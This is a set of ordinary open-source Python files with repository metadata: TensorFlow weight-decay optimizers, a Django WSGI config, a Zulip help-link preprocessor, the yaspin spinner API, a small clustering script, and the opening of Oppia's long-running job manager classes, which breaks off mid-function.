"symlink_target": ""
} |
"""Base class to make optimizers weight decay ready."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import adam
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.training import optimizer
from tensorflow.python.util.tf_export import tf_export
class DecoupledWeightDecayExtension(object):
"""This class allows to extend optimizers with decoupled weight decay.
It implements the decoupled weight decay described by Loshchilov & Hutter
(https://arxiv.org/pdf/1711.05101.pdf), in which the weight decay is
decoupled from the optimization steps w.r.t. to the loss function.
For SGD variants, this simplifies hyperparameter search since it decouples
the settings of weight decay and learning rate.
For adaptive gradient algorithms, it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield better
training loss and generalization error in the paper above.
This class alone is not an optimizer but rather extends existing
optimizers with decoupled weight decay. We explicitly define the two examples
used in the above paper (SGDW and AdamW), but in general this can extend
any OptimizerX by using
`extend_with_weight_decay(OptimizerX, weight_decay=weight_decay)`.
In order for it to work, it must be the first class the Optimizer with
weight decay inherits from, e.g.
```python
class AdamWOptimizer(DecoupledWeightDecayExtension, adam.AdamOptimizer):
def __init__(self, weight_decay, *args, **kwargs):
super(AdamWOptimizer, self).__init__(weight_decay, *args, **kwargs).
```
Note that this extension decays weights BEFORE applying the update based
on the gradient, i.e. this extension only has the desired behaviour for
optimizers which do not depend on the value of'var' in the update step!
"""
def __init__(self, weight_decay, **kwargs):
"""Construct the extension class that adds weight decay to an optimizer.
Args:
weight_decay: A `Tensor` or a floating point value, the factor by which
a variable is decayed in the update step.
**kwargs: Optional list or tuple or set of `Variable` objects to
decay.
"""
self._decay_var_list = None # is set in minimize or apply_gradients
self._weight_decay = weight_decay
# The tensors are initialized in call to _prepare
self._weight_decay_tensor = None
super(DecoupledWeightDecayExtension, self).__init__(**kwargs)
def minimize(self, loss, global_step=None, var_list=None,
gate_gradients=optimizer.Optimizer.GATE_OP,
aggregation_method=None, colocate_gradients_with_ops=False,
name=None, grad_loss=None, decay_var_list=None):
"""Add operations to minimize `loss` by updating `var_list` with decay.
This function is the same as Optimizer.minimize except that it allows to
specify the variables that should be decayed using decay_var_list.
If decay_var_list is None, all variables in var_list are decayed.
For more information see the documentation of Optimizer.minimize.
Args:
loss: A `Tensor` containing the value to minimize.
global_step: Optional `Variable` to increment by one after the
variables have been updated.
var_list: Optional list or tuple of `Variable` objects to update to
minimize `loss`. Defaults to the list of variables collected in
the graph under the key `GraphKeys.TRAINABLE_VARIABLES`.
gate_gradients: How to gate the computation of gradients. Can be
`GATE_NONE`, `GATE_OP`, or `GATE_GRAPH`.
aggregation_method: Specifies the method used to combine gradient terms.
Valid values are defined in the class `AggregationMethod`.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
name: Optional name for the returned operation.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
decay_var_list: Optional list of decay variables.
Returns:
An Operation that updates the variables in `var_list`. If `global_step`
was not `None`, that operation also increments `global_step`.
"""
self._decay_var_list = set(decay_var_list) if decay_var_list else False
return super(DecoupledWeightDecayExtension, self).minimize(
loss, global_step=global_step, var_list=var_list,
gate_gradients=gate_gradients, aggregation_method=aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops, name=name,
grad_loss=grad_loss)
def apply_gradients(self, grads_and_vars, global_step=None, name=None,
decay_var_list=None):
"""Apply gradients to variables and decay the variables.
This function is the same as Optimizer.apply_gradients except that it
allows to specify the variables that should be decayed using
decay_var_list. If decay_var_list is None, all variables in var_list
are decayed.
For more information see the documentation of Optimizer.apply_gradients.
Args:
grads_and_vars: List of (gradient, variable) pairs as returned by
`compute_gradients()`.
global_step: Optional `Variable` to increment by one after the
variables have been updated.
name: Optional name for the returned operation. Default to the
name passed to the `Optimizer` constructor.
decay_var_list: Optional list of decay variables.
Returns:
An `Operation` that applies the specified gradients. If `global_step`
was not None, that operation also increments `global_step`.
"""
self._decay_var_list = set(decay_var_list) if decay_var_list else False
return super(DecoupledWeightDecayExtension, self).apply_gradients(
grads_and_vars, global_step=global_step, name=name)
def _prepare(self):
weight_decay = self._weight_decay
if callable(weight_decay):
weight_decay = weight_decay()
self._weight_decay_tensor = ops.convert_to_tensor(
weight_decay, name="weight_decay")
# Call the optimizers _prepare function.
super(DecoupledWeightDecayExtension, self)._prepare()
def _decay_weights_op(self, var):
if not self._decay_var_list or var in self._decay_var_list:
return var.assign_sub(self._weight_decay * var, self._use_locking)
return control_flow_ops.no_op()
def _decay_weights_sparse_op(self, var, indices, scatter_add):
if not self._decay_var_list or var in self._decay_var_list:
return scatter_add(var, indices, -self._weight_decay * var,
self._use_locking)
return control_flow_ops.no_op()
# Here, we overwrite the apply functions that the base optimizer calls.
# super().apply_x resolves to the apply_x function of the BaseOptimizer.
def _apply_dense(self, grad, var):
with ops.control_dependencies([self._decay_weights_op(var)]):
return super(DecoupledWeightDecayExtension, self)._apply_dense(grad, var)
def _resource_apply_dense(self, grad, var):
with ops.control_dependencies([self._decay_weights_op(var)]):
return super(DecoupledWeightDecayExtension, self)._resource_apply_dense(
grad, var)
def _apply_sparse(self, grad, var):
scatter_add = state_ops.scatter_add
decay_op = self._decay_weights_sparse_op(var, grad.indices, scatter_add)
with ops.control_dependencies([decay_op]):
return super(DecoupledWeightDecayExtension, self)._apply_sparse(
grad, var)
def _resource_scatter_add(self, x, i, v, _=None):
# last argument allows for one overflow argument, to have the same function
# signature as state_ops.scatter_add
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_apply_sparse(self, grad, var, indices):
scatter_add = self._resource_scatter_add
decay_op = self._decay_weights_sparse_op(var, indices, scatter_add)
with ops.control_dependencies([decay_op]):
return super(DecoupledWeightDecayExtension, self)._resource_apply_sparse(
grad, var, indices)
def extend_with_decoupled_weight_decay(base_optimizer):
"""Factory function returning an optimizer class with decoupled weight decay.
Returns an optimizer class. An instance of the returned class computes the
update step of `base_optimizer` and additionally decays the weights.
E.g., the class returned by
`extend_with_decoupled_weight_decay(tf.train.AdamOptimizer)` is equivalent to
`tf.contrib.opt.AdamWOptimizer`.
The API of the new optimizer class slightly differs from the API of the
base optimizer:
- The first argument to the constructor is the weight decay rate.
- `minimize` and `apply_gradients` accept the optional keyword argument
`decay_var_list`, which specifies the variables that should be decayed.
If `None`, all variables that are optimized are decayed.
Usage example:
```python
# MyAdamW is a new class
MyAdamW = extend_with_decoupled_weight_decay(tf.train.AdamOptimizer)
# Create a MyAdamW object
optimizer = MyAdamW(weight_decay=0.001, learning_rate=0.001)
sess.run(optimizer.minimize(loss, decay_variables=[var1, var2]))
Note that this extension decays weights BEFORE applying the update based
on the gradient, i.e. this extension only has the desired behaviour for
optimizers which do not depend on the value of'var' in the update step!
```
Args:
base_optimizer: An optimizer class that inherits from tf.train.Optimizer.
Returns:
A new optimizer class that inherits from DecoupledWeightDecayExtension
and base_optimizer.
"""
class OptimizerWithDecoupledWeightDecay(DecoupledWeightDecayExtension,
base_optimizer):
"""Base_optimizer with decoupled weight decay.
This class computes the update step of `base_optimizer` and
additionally decays the variable with the weight decay being decoupled from
the optimization steps w.r.t. to the loss function, as described by
Loshchilov & Hutter (https://arxiv.org/pdf/1711.05101.pdf).
For SGD variants, this simplifies hyperparameter search since
it decouples the settings of weight decay and learning rate.
For adaptive gradient algorithms, it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield
better training loss and generalization error in the paper above.
"""
def __init__(self, weight_decay, *args, **kwargs):
# super delegation is necessary here
# pylint: disable=useless-super-delegation
super(OptimizerWithDecoupledWeightDecay, self).__init__(
weight_decay, *args, **kwargs)
# pylint: enable=useless-super-delegation
return OptimizerWithDecoupledWeightDecay
@tf_export("contrib.opt.MomentumWOptimizer")
class MomentumWOptimizer(DecoupledWeightDecayExtension,
momentum_opt.MomentumOptimizer):
"""Optimizer that implements the Momentum algorithm with weight_decay.
This is an implementation of the SGDW optimizer described in "Fixing
Weight Decay Regularization in Adam" by Loshchilov & Hutter
(https://arxiv.org/abs/1711.05101)
([pdf])(https://arxiv.org/pdf/1711.05101.pdf).
It computes the update step of `train.MomentumOptimizer` and additionally
decays the variable. Note that this is different from adding
L2 regularization on the variables to the loss. Decoupling the weight decay
from other hyperparameters (in particular the learning rate) simplifies
hyperparameter search.
For further information see the documentation of the Momentum Optimizer.
Note that this optimizer can also be instantiated as
```python
extend_with_weight_decay(tf.train.MomentumOptimizer,
weight_decay=weight_decay)
```
"""
def __init__(self, weight_decay, learning_rate, momentum,
use_locking=False, name="MomentumW", use_nesterov=False):
"""Construct a new MomentumW optimizer.
For further information see the documentation of the Momentum Optimizer.
Args:
weight_decay: A `Tensor` or a floating point value. The weight decay.
learning_rate: A `Tensor` or a floating point value. The learning rate.
momentum: A `Tensor` or a floating point value. The momentum.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Momentum".
use_nesterov: If `True` use Nesterov Momentum.
See [Sutskever et al., 2013](
http://jmlr.org/proceedings/papers/v28/sutskever13.pdf).
This implementation always computes gradients at the value of the
variable(s) passed to the optimizer. Using Nesterov Momentum makes the
variable(s) track the values called `theta_t + mu*v_t` in the paper.
@compatibility(eager)
When eager execution is enabled, learning_rate, weight_decay and momentum
can each be a callable that takes no arguments and returns the actual value
to use. This can be useful for changing these values across different
invocations of optimizer functions.
@end_compatibility
"""
super(MomentumWOptimizer, self).__init__(
weight_decay, learning_rate=learning_rate, momentum=momentum,
use_locking=use_locking, name=name, use_nesterov=use_nesterov)
@tf_export("contrib.opt.AdamWOptimizer")
class AdamWOptimizer(DecoupledWeightDecayExtension, adam.AdamOptimizer):
"""Optimizer that implements the Adam algorithm with weight decay.
This is an implementation of the AdamW optimizer described in "Fixing
Weight Decay Regularization in Adam" by Loshchilov & Hutter
(https://arxiv.org/abs/1711.05101)
([pdf])(https://arxiv.org/pdf/1711.05101.pdf).
It computes the update step of `train.AdamOptimizer` and additionally decays
the variable. Note that this is different from adding L2 regularization on
the variables to the loss: it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield better
training loss and generalization error in the paper above.
For further information see the documentation of the Adam Optimizer.
Note that this optimizer can also be instantiated as
```python
extend_with_weight_decay(tf.train.AdamOptimizer, weight_decay=weight_decay)
```
"""
def __init__(self, weight_decay, learning_rate=0.001, beta1=0.9, beta2=0.999,
epsilon=1e-8, use_locking=False, name="AdamW"):
"""Construct a new AdamW optimizer.
For further information see the documentation of the Adam Optimizer.
Args:
weight_decay: A `Tensor` or a floating point value. The weight decay.
learning_rate: A Tensor or a floating point value. The learning rate.
beta1: A float value or a constant float tensor.
The exponential decay rate for the 1st moment estimates.
beta2: A float value or a constant float tensor.
The exponential decay rate for the 2nd moment estimates.
epsilon: A small constant for numerical stability. This epsilon is
"epsilon hat" in the Kingma and Ba paper (in the formula just before
Section 2.1), not the epsilon in Algorithm 1 of the paper.
use_locking: If True use locks for update operations.
name: Optional name for the operations created when applying gradients.
Defaults to "Adam".
"""
super(AdamWOptimizer, self).__init__(
weight_decay, learning_rate=learning_rate, beta1=beta1, beta2=beta2,
epsilon=epsilon, use_locking=use_locking, name=name)
| {
"content_hash": "cbd75c599e864105b87d3c0b643be469",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 79,
"avg_line_length": 45.98847262247838,
"alnum_prop": 0.7224589547562351,
"repo_name": "ZhangXinNan/tensorflow",
"id": "b9cf40eb7b2d11c98b93c51213145ca4e2670318",
"size": "16648",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/opt/python/training/weight_decay_optimizers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1286"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "327005"
},
{
"name": "C#",
"bytes": "8215"
},
{
"name": "C++",
"bytes": "46648068"
},
{
"name": "CMake",
"bytes": "206720"
},
{
"name": "Dockerfile",
"bytes": "6978"
},
{
"name": "Go",
"bytes": "1210133"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "830576"
},
{
"name": "Jupyter Notebook",
"bytes": "2632421"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "51309"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40046802"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "455624"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
"""
WSGI config for source project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "source.settings")
application = get_wsgi_application()
| {
"content_hash": "0a48d0aa3ca264fb9eaf12fd8a049566",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.375,
"alnum_prop": 0.7692307692307693,
"repo_name": "toladata/TolaProfile",
"id": "a64d3153fbbf2f492cf038814ad2a7ea5c9c3f10",
"size": "390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "source/wsgi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "86675"
},
{
"name": "HTML",
"bytes": "51669"
},
{
"name": "JavaScript",
"bytes": "268806"
},
{
"name": "Python",
"bytes": "43126"
},
{
"name": "TypeScript",
"bytes": "93391"
}
],
"symlink_target": ""
} |
import re
import markdown
from typing import Any, Dict, List, Optional
from typing.re import Match
from markdown.preprocessors import Preprocessor
# There is a lot of duplicated code between this file and
# help_settings_links.py. So if you're making a change here consider making
# it there as well.
REGEXP = re.compile(r'\{relative\|(?P<link_type>.*?)\|(?P<key>.*?)\}')
gear_info = {
# The pattern is key: [name, link]
# key is from REGEXP: `{relative|gear|key}`
# name is what the item is called in the gear menu: `Select **name**.`
# link is used for relative links: `Select [name](link).`
'manage-streams': ['Manage streams', '/#streams/subscribed'],
'settings': ['Settings', '/#settings/your-account'],
'manage-organization': ['Manage organization', '/#organization/organization-profile'],
'integrations': ['Integrations', '/integrations'],
'stats': ['Statistics', '/stats'],
'plans': ['Plans and pricing', '/plans'],
'billing': ['Billing', '/billing'],
'invite': ['Invite users', '/#invite'],
}
gear_instructions = """
1. From your desktop, click on the **gear**
(<i class="fa fa-cog"></i>) in the upper right corner.
1. Select %(item)s.
"""
def gear_handle_match(key: str) -> str:
if relative_help_links:
item = '[%s](%s)' % (gear_info[key][0], gear_info[key][1])
else:
item = '**%s**' % (gear_info[key][0],)
return gear_instructions % {'item': item}
stream_info = {
'all': ['All streams', '/#streams/all'],
'subscribed': ['Your streams', '/#streams/subscribed'],
}
stream_instructions_no_link = """
1. From your desktop, click on the **gear**
(<i class="fa fa-cog"></i>) in the upper right corner.
1. Click **Manage streams**.
"""
def stream_handle_match(key: str) -> str:
if relative_help_links:
return "1. Go to [%s](%s)." % (stream_info[key][0], stream_info[key][1])
if key == 'all':
return stream_instructions_no_link + "\n\n1. Click **All streams** in the upper left."
return stream_instructions_no_link
LINK_TYPE_HANDLERS = {
'gear': gear_handle_match,
'stream': stream_handle_match,
}
class RelativeLinksHelpExtension(markdown.Extension):
def extendMarkdown(self, md: markdown.Markdown, md_globals: Dict[str, Any]) -> None:
""" Add RelativeLinksHelpExtension to the Markdown instance. """
md.registerExtension(self)
md.preprocessors.add('help_relative_links', RelativeLinks(), '_begin')
relative_help_links = None # type: Optional[bool]
def set_relative_help_links(value: bool) -> None:
global relative_help_links
relative_help_links = value
class RelativeLinks(Preprocessor):
def run(self, lines: List[str]) -> List[str]:
done = False
while not done:
for line in lines:
loc = lines.index(line)
match = REGEXP.search(line)
if match:
text = [self.handleMatch(match)]
# The line that contains the directive to include the macro
# may be preceded or followed by text or tags, in that case
# we need to make sure that any preceding or following text
# stays the same.
line_split = REGEXP.split(line, maxsplit=0)
preceding = line_split[0]
following = line_split[-1]
text = [preceding] + text + [following]
lines = lines[:loc] + text + lines[loc+1:]
break
else:
done = True
return lines
def handleMatch(self, match: Match[str]) -> str:
return LINK_TYPE_HANDLERS[match.group('link_type')](match.group('key'))
def makeExtension(*args: Any, **kwargs: Any) -> RelativeLinksHelpExtension:
return RelativeLinksHelpExtension(*args, **kwargs)
| {
"content_hash": "c94f93880aab00739b10ee3f6a3b78fd",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 94,
"avg_line_length": 35.925925925925924,
"alnum_prop": 0.6054123711340206,
"repo_name": "tommyip/zulip",
"id": "f13e411c1c81a07f1510158968a8ca35a500b423",
"size": "3880",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/lib/bugdown/help_relative_links.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "400301"
},
{
"name": "Dockerfile",
"bytes": "2939"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "718599"
},
{
"name": "JavaScript",
"bytes": "3092201"
},
{
"name": "Perl",
"bytes": "398763"
},
{
"name": "Puppet",
"bytes": "71123"
},
{
"name": "Python",
"bytes": "6889539"
},
{
"name": "Ruby",
"bytes": "6110"
},
{
"name": "Shell",
"bytes": "119898"
},
{
"name": "TypeScript",
"bytes": "14645"
}
],
"symlink_target": ""
} |
"""
yaspin.api
~~~~~~~~~~
This module implements the Yaspin API.
"""
import signal
from .core import Yaspin
from .signal_handlers import default_handler
def yaspin(*args, **kwargs):
"""Display spinner in stdout.
Can be used as a context manager or as a function decorator.
Arguments:
spinner (base_spinner.Spinner, optional): Spinner object to use.
text (str, optional): Text to show along with spinner.
color (str, optional): Spinner color.
on_color (str, optional): Color highlight for the spinner.
attrs (list, optional): Color attributes for the spinner.
reversal (bool, optional): Reverse spin direction.
side (str, optional): Place spinner to the right or left end
of the text string.
sigmap (dict, optional): Maps POSIX signals to their respective
handlers.
Returns:
core.Yaspin: instance of the Yaspin class.
Raises:
ValueError: If unsupported ``color`` is specified.
ValueError: If unsupported ``on_color`` is specified.
ValueError: If unsupported color attribute in ``attrs``
is specified.
ValueError: If trying to register handler for SIGKILL signal.
ValueError: If unsupported ``side`` is specified.
Available text colors:
red, green, yellow, blue, magenta, cyan, white.
Available text highlights:
on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan,
on_white, on_grey.
Available attributes:
bold, dark, underline, blink, reverse, concealed.
Example::
# Use as a context manager
with yaspin():
some_operations()
# Context manager with text
with yaspin(text="Processing..."):
some_operations()
# Context manager with custom sequence
with yaspin(Spinner('-\\|/', 150)):
some_operations()
# As decorator
@yaspin(text="Loading...")
def foo():
time.sleep(5)
foo()
"""
return Yaspin(*args, **kwargs)
def kbi_safe_yaspin(*args, **kwargs):
kwargs["sigmap"] = {signal.SIGINT: default_handler}
return Yaspin(*args, **kwargs)
# Handle PYTHONOPTIMIZE=2 case, when docstrings are set to None.
if yaspin.__doc__:
_kbi_safe_doc = yaspin.__doc__.replace("yaspin", "kbi_safe_yaspin")
kbi_safe_yaspin.__doc__ = _kbi_safe_doc
| {
"content_hash": "325ab8135d39f3a7490aa1b62f55b7fb",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 72,
"avg_line_length": 28.423529411764704,
"alnum_prop": 0.6216887417218543,
"repo_name": "kennethreitz/pipenv",
"id": "3e0c22ef91694068a0f5a91cc529360692ce1468",
"size": "2533",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pipenv/vendor/yaspin/api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "202"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2588085"
},
{
"name": "Roff",
"bytes": "40754"
}
],
"symlink_target": ""
} |
import lib.clusters as clusters
import sys
argvs = sys.argv
argc = len(argvs)
# 引数がなければ使い方を表示してプログラムを終了する。
if (argc < 2):
print 'Usage: # python %s path_to_blogdata.txt' % argvs[0]
quit()
input_file_path = argvs[1]
output_file_path = 'draw2d.result.jpg'
# こっからメイン
blognames,words,data = clusters.read_file(input_file_path)
coords = clusters.scale_down(data)
clusters.draw2d(coords, blognames, jpeg=output_file_path)
| {
"content_hash": "3f093d9687f7443ba69062e19de515e0",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 60,
"avg_line_length": 21.3,
"alnum_prop": 0.7323943661971831,
"repo_name": "saxsir/hhlab2013s-js-a",
"id": "336c2e144b0d6907570221a4bb6597f41bf2bf21",
"size": "507",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/python/chapter3/draw2d_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1912"
},
{
"name": "JavaScript",
"bytes": "98483"
},
{
"name": "Python",
"bytes": "177547"
}
],
"symlink_target": ""
} |
"""Common classes and methods for managing long running jobs."""
__author__ = 'Sean Lip'
import ast
import copy
import datetime
import logging
import traceback
import utils
from core.platform import models
(base_models, job_models,) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.job])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from google.appengine.ext import ndb
from mapreduce import base_handler
from mapreduce import context
from mapreduce import input_readers
from mapreduce import mapreduce_pipeline
from mapreduce import model as mapreduce_model
from mapreduce.lib.pipeline import pipeline
from mapreduce import util as mapreduce_util
MAPPER_PARAM_KEY_ENTITY_KINDS = 'entity_kinds'
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS = 'queued_time_msecs'
# Name of an additional parameter to pass into the MR job for cleaning up
# old auxiliary job models.
MAPPER_PARAM_MAX_START_TIME_MSEC = 'max_start_time_msec'
STATUS_CODE_NEW = job_models.STATUS_CODE_NEW
STATUS_CODE_QUEUED = job_models.STATUS_CODE_QUEUED
STATUS_CODE_STARTED = job_models.STATUS_CODE_STARTED
STATUS_CODE_COMPLETED = job_models.STATUS_CODE_COMPLETED
STATUS_CODE_FAILED = job_models.STATUS_CODE_FAILED
STATUS_CODE_CANCELED = job_models.STATUS_CODE_CANCELED
VALID_STATUS_CODE_TRANSITIONS = {
STATUS_CODE_NEW: [STATUS_CODE_QUEUED],
STATUS_CODE_QUEUED: [STATUS_CODE_STARTED, STATUS_CODE_CANCELED],
STATUS_CODE_STARTED: [
STATUS_CODE_COMPLETED, STATUS_CODE_FAILED, STATUS_CODE_CANCELED],
STATUS_CODE_COMPLETED: [],
STATUS_CODE_FAILED: [],
STATUS_CODE_CANCELED: [],
}
# The default amount of time that defines a 'recent' job. Jobs that were
# queued more recently than this number of milliseconds ago are considered
# 'recent'.
DEFAULT_RECENCY_MSEC = 14 * 24 * 60 * 60 * 1000
# The maximum number of previously-run jobs to show in the admin dashboard.
NUM_JOBS_IN_DASHBOARD_LIMIT = 100
class BaseJobManager(object):
"""Base class for managing long-running jobs.
These jobs are not transaction-safe, and multiple jobs of the same kind
may run at once and overlap. Individual jobs should account for this. In
particular, if a job writes to some location, no other enqueued or running
job should be writing to, or reading from, that location.
This is expected to be the case for one-off migration jobs, as well as
batch reporting jobs. One-off migration jobs are expected to be transient
and will not be a permanent part of the codebase. Batch reporting jobs are
expected to write to a particular datastore model that is optimized for
fast querying; each batch reporting job should correspond to exactly one of
these models. The reporting jobs are expected to be run as MapReduces; to
find existing ones, search for subclasses of BaseMapReduceJobManager.
Note that the enqueue(), register_start(), register_completion(),
register_failure() and cancel() methods in this class batch the following
operations: (a) pre- and post-hooks, (b) updating the status of the job in
the datastore, and (c) actually performing the operation. Each entire batch
is not run in a transaction, but subclasses can still perform (a) or (c)
transactionally if they wish to.
"""
@classmethod
def _is_abstract(cls):
return cls in ABSTRACT_BASE_CLASSES
@classmethod
def create_new(cls):
"""Creates a new job of this class type. Returns the id of this job."""
if cls._is_abstract():
raise Exception(
'Tried to directly create a job using the abstract base '
'manager class %s, which is not allowed.' % cls.__name__)
def _create_new_job():
job_id = job_models.JobModel.get_new_id(cls.__name__)
job_models.JobModel(id=job_id, job_type=cls.__name__).put()
return job_id
return transaction_services.run_in_transaction(_create_new_job)
@classmethod
def enqueue(cls, job_id, additional_job_params=None):
"""Marks a job as queued and adds it to a queue for processing."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_QUEUED)
cls._require_correct_job_type(model.job_type)
# Enqueue the job.
cls._pre_enqueue_hook(job_id)
cls._real_enqueue(job_id, additional_job_params)
model.status_code = STATUS_CODE_QUEUED
model.time_queued_msec = utils.get_current_time_in_millisecs()
model.put()
cls._post_enqueue_hook(job_id)
@classmethod
def register_start(cls, job_id, metadata=None):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_STARTED)
cls._require_correct_job_type(model.job_type)
cls._pre_start_hook(job_id)
model.metadata = metadata
model.status_code = STATUS_CODE_STARTED
model.time_started_msec = utils.get_current_time_in_millisecs()
model.put()
cls._post_start_hook(job_id)
@classmethod
def register_completion(cls, job_id, output):
"""Marks a job as completed."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_COMPLETED)
cls._require_correct_job_type(model.job_type)
model.status_code = STATUS_CODE_COMPLETED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.output = output
model.put()
cls._post_completed_hook(job_id)
@classmethod
def register_failure(cls, job_id, error):
"""Marks a job as failed."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_FAILED)
cls._require_correct_job_type(model.job_type)
model.status_code = STATUS_CODE_FAILED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.error = error
model.put()
cls._post_failure_hook(job_id)
@classmethod
def cancel(cls, job_id, user_id):
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_CANCELED)
cls._require_correct_job_type(model.job_type)
cancel_message = 'Canceled by %s' % (user_id or 'system')
# Cancel the job.
cls._pre_cancel_hook(job_id, cancel_message)
model.status_code = STATUS_CODE_CANCELED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.error = cancel_message
model.put()
cls._post_cancel_hook(job_id, cancel_message)
@classmethod
def is_active(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code in [STATUS_CODE_QUEUED, STATUS_CODE_STARTED]
@classmethod
def has_finished(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code in [STATUS_CODE_COMPLETED, STATUS_CODE_FAILED]
@classmethod
def cancel_all_unfinished_jobs(cls, user_id):
"""Cancel all queued or started jobs of this job type."""
unfinished_job_models = job_models.JobModel.get_unfinished_jobs(
cls.__name__)
for model in unfinished_job_models:
cls.cancel(model.id, user_id)
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
"""Does the actual work of enqueueing a job for deferred execution.
Must be implemented by subclasses.
"""
raise NotImplementedError(
'Subclasses of BaseJobManager should implement _real_enqueue().')
@classmethod
def get_status_code(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code
@classmethod
def get_time_queued_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_queued_msec
@classmethod
def get_time_started_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_started_msec
@classmethod
def get_time_finished_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_finished_msec
@classmethod
def get_metadata(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.metadata
@classmethod
def get_output(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.output
@classmethod
def get_error(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.error
@classmethod
def _require_valid_transition(
cls, job_id, old_status_code, new_status_code):
valid_new_status_codes = VALID_STATUS_CODE_TRANSITIONS[old_status_code]
if new_status_code not in valid_new_status_codes:
raise Exception(
'Invalid status code change for job %s: from %s to %s' %
(job_id, old_status_code, new_status_code))
@classmethod
def _require_correct_job_type(cls, job_type):
if job_type != cls.__name__:
raise Exception(
'Invalid job type %s for class %s' % (job_type, cls.__name__))
@classmethod
def _pre_enqueue_hook(cls, job_id):
pass
@classmethod
def _post_enqueue_hook(cls, job_id):
pass
@classmethod
def _pre_start_hook(cls, job_id):
pass
@classmethod
def _post_start_hook(cls, job_id):
pass
@classmethod
def _post_completed_hook(cls, job_id):
pass
@classmethod
def _post_failure_hook(cls, job_id):
pass
@classmethod
def _pre_cancel_hook(cls, job_id, cancel_message):
pass
@classmethod
def _post_cancel_hook(cls, job_id, cancel_message):
pass
class BaseDeferredJobManager(BaseJobManager):
@classmethod
def _run(cls, additional_job_params):
"""Function that performs the main business logic of the job.
Needs to be implemented by subclasses.
"""
raise NotImplementedError
@classmethod
def _run_job(cls, job_id, additional_job_params):
"""Starts the job."""
logging.info(
